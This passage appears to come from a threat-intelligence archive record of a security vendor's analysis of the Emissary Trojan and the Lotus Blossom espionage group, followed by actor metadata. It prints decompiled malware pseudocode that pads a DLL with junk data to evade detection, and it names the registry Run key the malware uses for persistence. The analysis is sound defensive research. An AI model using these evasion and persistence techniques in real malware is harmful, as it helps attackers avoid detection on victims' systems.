For instance, the following\r\npseudocode contains two loops that will end up appending 524,288,000 bytes to the end of the file, resulting in a\r\nDLL that exceeds 500MB in size:\r\nWriteFile(hFile, buf_EmissaryDllFromResource, nNumberOfBytesToWrite,\r\n\u0026nNumberOfBytesToWrite, 0);\r\nbuf_junkData = 0;\r\nret_time = time(0);\r\nsrand(ret_time);\r\nfor ( i = 0; i \u003c 51200; ++i )\r\n{\r\n  for ( j = 0; j \u003c 640; ++j )\r\n  {\r\n    random_byte = rand() % 255;\r\n    offset_in_buff_junkData = \u0026buf_junkData + 16 * j;\r\n    dword_junkData = 0x1010101 * random_byte;\r\n    *offset_in_buff_junkData = dword_junkData;\r\n    *(offset_in_buff_junkData + 1) = dword_junkData;\r\n    *(offset_in_buff_junkData + 2) = dword_junkData;\r\n    *(offset_in_buff_junkData + 3) = dword_junkData;\r\n  }\r\n  WriteFile(hFile, \u0026buf_junkData, 0x2800u, \u0026nNumberOfBytesToWrite, 0);\r\n}\r\nWith the new filenames, malware persistence is achieved via the following registry key:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Syncmgr: \"rundll32.exe \"C:\\Documents and\r\nSettings\\[username]\u003e\\Application Data\\Programs\\Syncmgr.dll\",Setting\"\r\nDate: 11/24/2015\r\nSHA256: bfceccdd553c7e26006bb044ea6d87e597c7cce08218068e31dc940e9f55b636 (Base DLL with junk data\r\nremoved)\r\nOriginal Name: WinDLL.dll\r\nIn another attempt to avoid detection based on PE header hashes, the Trojan was recompiled without making any\r\nchanges.\r\nConclusion\r\nThe actors using Emissary, who were previously reported as behind Operation Lotus Blossom, have been active\r\nfor at least seven years in Southeast Asia. 
They are persistent, evolve over time, and have enough resources to\r\nhave multiple custom RATs that receive regular updates. The targeting is largely military or government, with\r\nsome cases of higher education and high-tech companies. They also have the ability to select and use appropriate\r\ndecoys in multiple Asian languages that appear legitimate.\r\nThe use of Emissary appears to be focused only on Taiwan and Hong Kong, with regular malware updates to\r\navoid detection and to increase the odds of success. Of particular note, there is an interesting coincidence between\r\nthe timing of the publication of our Operation Lotus Blossom report and a flurry of Emissary updates. The first\r\noccurred ten days after publication and was followed by updates over increasingly shorter time frames, starting at\r\nroughly every three months and progressing to monthly by the final version discussed here. Until that publication,\r\naccording to our research, Emissary was updated roughly every two years. This indicates the threat actors may take\r\nnote of threat intelligence reporting and are fully capable of making immediate changes when deemed necessary.\r\nIn addition to the malware evolution, the actors also shifted from solely spear-phishing targets with attachments to\r\nalso compromising legitimate websites to host malware. 
The consistent updates to the Trojan and the shift in the\r\nactor’s TTPs suggest that this threat will continue to use Emissary in future espionage-related attacks.\r\nWe have updated the Emissary tag for Palo Alto Networks AutoFocus users to track this threat using the indicators\r\ndiscussed in this blog.\r\nEmissary Delivery Documents\r\nEmissary Installers/Loaders\r\nEmissary DLL Version 1.0 through 5.4\r\nEmissary C2 URLs\r\nEmissary Campaign Codes\r\nSource: https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/"
	],
	"report_names": [
		"emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "2fa14cf4-969f-48bc-b68e-a8e7eedc6e98",
			"created_at": "2022-10-25T15:50:23.538608Z",
			"updated_at": "2026-04-10T02:00:05.378092Z",
			"deleted_at": null,
			"main_name": "Lotus Blossom",
			"aliases": [
				"Lotus Blossom",
				"DRAGONFISH",
				"Spring Dragon",
				"RADIUM",
				"Raspberry Typhoon",
				"Bilbug",
				"Thrip"
			],
			"source_name": "MITRE:Lotus Blossom",
			"tools": [
				"AdFind",
				"Impacket",
				"Elise",
				"Hannotog",
				"NBTscan",
				"Sagerunex",
				"certutil"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c21da9ce-944f-4a37-8ce3-71a0f738af80",
			"created_at": "2025-08-07T02:03:24.586257Z",
			"updated_at": "2026-04-10T02:00:03.804264Z",
			"deleted_at": null,
			"main_name": "BRONZE ELGIN",
			"aliases": [
				"CTG-8171 ",
				"Lotus Blossom ",
				"Lotus Panda ",
				"Lstudio",
				"Spring Dragon "
			],
			"source_name": "Secureworks:BRONZE ELGIN",
			"tools": [
				"Chrysalis",
				"Cobalt Strike",
				"Elise",
				"Emissary Trojan",
				"Lzari",
				"Meterpreter"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "87a20b72-ab72-402f-9013-c746c8458b0b",
			"created_at": "2023-01-06T13:46:38.293223Z",
			"updated_at": "2026-04-10T02:00:02.915184Z",
			"deleted_at": null,
			"main_name": "LOTUS PANDA",
			"aliases": [
				"Red Salamander",
				"Lotus BLossom",
				"Billbug",
				"Spring Dragon",
				"ST Group",
				"BRONZE ELGIN",
				"ATK1",
				"G0030",
				"Lotus Blossom",
				"DRAGONFISH"
			],
			"source_name": "MISPGALAXY:LOTUS PANDA",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "eaa8168f-3fab-4831-aa60-5956f673e6b3",
			"created_at": "2022-10-25T16:07:23.805824Z",
			"updated_at": "2026-04-10T02:00:04.754761Z",
			"deleted_at": null,
			"main_name": "Lotus Blossom",
			"aliases": [
				"ATK 1",
				"ATK 78",
				"Billbug",
				"Bronze Elgin",
				"CTG-8171",
				"Dragonfish",
				"G0030",
				"G0076",
				"Lotus Blossom",
				"Operation Lotus Blossom",
				"Red Salamander",
				"Spring Dragon",
				"Thrip"
			],
			"source_name": "ETDA:Lotus Blossom",
			"tools": [
				"BKDR_ESILE",
				"Catchamas",
				"EVILNEST",
				"Elise",
				"Group Policy Results Tool",
				"Hannotog",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"PsExec",
				"Rikamanu",
				"Sagerunex",
				"Spedear",
				"Syndicasec",
				"WMI Ghost",
				"Wimmie",
				"gpresult"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434733,
	"ts_updated_at": 1775792067,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/93269fb4566d06a8bc741fe1498cf33c5ce5a9bc.pdf",
		"text": "https://archive.orkl.eu/93269fb4566d06a8bc741fe1498cf33c5ce5a9bc.txt",
		"img": "https://archive.orkl.eu/93269fb4566d06a8bc741fe1498cf33c5ce5a9bc.jpg"
	}
}